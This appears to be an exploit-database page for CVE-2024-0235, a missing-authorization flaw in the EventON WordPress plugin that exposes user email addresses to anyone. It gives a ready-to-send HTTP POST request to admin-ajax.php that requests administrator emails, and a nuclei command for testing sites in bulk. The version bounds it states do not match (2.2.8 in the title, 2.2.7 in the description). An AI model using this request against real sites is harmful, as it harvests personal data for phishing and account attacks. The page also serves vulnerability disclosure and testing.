.. / CVE-2024-0235

Exploit for WordPress Plugin EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Information Disclosure (CVE-2024-0235)

Description:

The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.

Affected Products:

Proof of Concept

PoC exploits

The following HTTP request demonstrates how to retrieve email addresses:

  POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1
  Host: <target-site>
  Content-Type: application/x-www-form-urlencoded

  _user_role=administrator

Nuclei Template

View the template here CVE-2024-0235.yaml

Validate with Nuclei

echo "$URL" | nuclei -t ~/nuclei-templates/http/cves/2024/CVE-2024-0235.yaml
Copy

References:

https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
https://github.com/fkie-cad/nvd-json-data-feeds
https://nvd.nist.gov/vuln/detail/CVE-2024-0235